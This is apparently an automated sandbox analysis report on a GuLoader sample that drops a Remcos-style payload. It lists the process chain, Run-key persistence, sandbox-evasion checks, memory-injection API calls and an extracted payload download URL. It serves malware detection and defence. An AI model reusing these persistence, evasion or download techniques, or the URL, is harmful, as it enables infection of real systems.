Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00584084 NtProtectVirtualMemory,	9_2_00584084
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00566970 NtProtectVirtualMemory,	9_2_00566970
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0057557A NtAllocateVirtualMemory,	9_2_0057557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C3474A NtSetContextThread,	15_2_02C3474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C34084 NtProtectVirtualMemory,	15_2_02C34084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C2087E NtWriteVirtualMemory,	15_2_02C2087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C2557A NtAllocateVirtualMemory,	15_2_02C2557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C3130A NtWriteVirtualMemory,	15_2_02C3130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C27574 NtWriteVirtualMemory,	15_2_02C27574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F74084 NtProtectVirtualMemory,	17_2_04F74084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F6087E NtWriteVirtualMemory,	17_2_04F6087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F6557A NtAllocateVirtualMemory,	17_2_04F6557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F7474A NtSetInformationThread,	17_2_04F7474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F67574 NtWriteVirtualMemory,	17_2_04F67574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F7130A NtWriteVirtualMemory,	17_2_04F7130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0235087E NtWriteVirtualMemory,	18_2_0235087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_02364084 NtProtectVirtualMemory,	18_2_02364084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0235557A NtAllocateVirtualMemory,	18_2_0235557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0236474A NtResumeThread,	18_2_0236474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0236130A NtWriteVirtualMemory,	18_2_0236130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_02357574 NtWriteVirtualMemory,	18_2_02357574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 19_2_0058727E Sleep,NtProtectVirtualMemory,	19_2_0058727E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 19_2_00586E0F NtProtectVirtualMemory,	19_2_00586E0F
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 19_2_00586CD1 NtProtectVirtualMemory,	19_2_00586CD1
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 19_2_00586E17 NtProtectVirtualMemory,	19_2_00586E17
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 19_2_005873EB NtProtectVirtualMemory,	19_2_005873EB
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 19_2_00586CCC NtProtectVirtualMemory,	19_2_00586CCC
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 19_2_005870C5 NtProtectVirtualMemory,	19_2_005870C5
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_00586E0F NtProtectVirtualMemory,	20_2_00586E0F
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_00584084 NtProtectVirtualMemory,	20_2_00584084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_00566970 NtProtectVirtualMemory,	20_2_00566970
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_0057557A NtAllocateVirtualMemory,	20_2_0057557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_00586E0F NtProtectVirtualMemory,	21_2_00586E0F
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_00584084 NtProtectVirtualMemory,	21_2_00584084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_00566970 NtProtectVirtualMemory,	21_2_00566970
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_0057557A NtAllocateVirtualMemory,	21_2_0057557A

Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process Stats: CPU usage > 98%

Source: mU9H96igb3.exe, 00000002.00000000.137179026496.0000000000431000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
Source: mU9H96igb3.exe, 00000009.00000000.137581988864.0000000000431000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
Source: mU9H96igb3.exe, 00000009.00000002.137983891314.00000000009FC000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs mU9H96igb3.exe
Source: mU9H96igb3.exe, 00000009.00000002.137983891314.00000000009FC000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs mU9H96igb3.exe
Source: mU9H96igb3.exe	Binary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe

Source: mU9H96igb3.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dlls.exe.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90

Source: mU9H96igb3.exe	Virustotal: Detection: 32%
Source: mU9H96igb3.exe	Metadefender: Detection: 25%
Source: mU9H96igb3.exe	ReversingLabs: Detection: 24%

Source: C:\Users\user\Desktop\mU9H96igb3.exe

File read: C:\Users\user\Desktop\mU9H96igb3.exe

Jump to behavior

Source: mU9H96igb3.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\mU9H96igb3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'	Jump to behavior

Source: C:\Users\user\Desktop\mU9H96igb3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\mU9H96igb3.exe

File created: C:\Users\user\AppData\Roaming\Adobes

Jump to behavior

Source: C:\Users\user\Desktop\mU9H96igb3.exe

File created: C:\Users\user\AppData\Local\Temp\install.vbs

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@19/4@2/2

Source: C:\Users\user\Desktop\mU9H96igb3.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:304:WilStaging_02
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Mutant created: \Sessions\1\BaseNamedObjects\Remcos-HCJBCA
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03

Source: C:\Users\user\Desktop\mU9H96igb3.exe

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_0041A474 push ebp; ret	2_2_0041A4CD
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_0040E9CB push ecx; retf	2_2_0040E9CC
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_004191F0 push ecx; ret	2_2_004191F1
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_004131A3 push ecx; ret	2_2_004132DD
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_004086CE push eax; retf	2_2_004086CF
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_00411ACE push ecx; ret	2_2_00411B05
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_004132DE push ecx; ret	2_2_0041331D
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_0041729D push edx; retf	2_2_004172A6
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_0040DAAA push ecx; ret	2_2_0040DAD5
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_0040E6B3 push ecx; ret	2_2_0040E6C1
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_00417AB9 push eax; ret	2_2_00417AC3
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_0040A750 push ss; retf	2_2_0040A751
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_00411B06 push ecx; ret	2_2_00411B05
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_00407B81 push esi; retf	2_2_00407B83
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BE267D push FFFFFF94h; retf	2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02C04084 push FFFFFF94h; retf	2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BE2A10 push FFFFFF94h; retf	2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BE1611 push esi; iretd	2_2_02BE167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BE67BC push es; ret	2_2_02BE67F4
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF6BF6 push FFFFFF94h; retf	2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BE1327 push esi; iretd	2_2_02BE167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BE1366 push esi; iretd	2_2_02BE167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0056267D push FFFFFF94h; retf	9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00584084 push FFFFFF94h; retf	9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00562A10 push FFFFFF94h; retf	9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00561611 push esi; iretd	9_2_0056167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00561366 push esi; iretd	9_2_0056167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00561327 push esi; iretd	9_2_0056167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00576BF6 push FFFFFF94h; retf	9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_005667BC push es; ret	9_2_005667F4
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_0041A474 push ebp; ret	15_2_0041A4CD

Source: C:\Users\user\Desktop\mU9H96igb3.exe

File created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Users\user\Desktop\mU9H96igb3.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run Chrome

Jump to behavior

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome			Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome			Jump to behavior

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\mU9H96igb3.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Dlls.exe, 00000012.00000002.138718337791.000000000073C000.00000004.00000020.sdmp	Binary or memory string: TROGRAM FILES\QEMU-GA\QEMU-GA.EXET
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTP://IMPLANTECAPILARPEREIRA.COM/NETGENERATION10%20STARTUP_KCFPCD130.BINHTTP://IMPLANTECAPILARPEREIRA.COM/NETGENERATION10%20STARTUP_KCFPCD130.BIN

Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe TID: 7708	Thread sleep count: 9188 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe TID: 7708	Thread sleep time: -45940s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe

Thread sleep count: Count: 9188 delay: -5

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\mU9H96igb3.exe

Code function: 2_2_02BFFBA1 rdtsc

2_2_02BFFBA1

Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Window / User API: threadDelayed 9188			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Window / User API: foregroundWindowGot 478			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\mU9H96igb3.exe

System information queried: ModuleInformation

Jump to behavior

Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
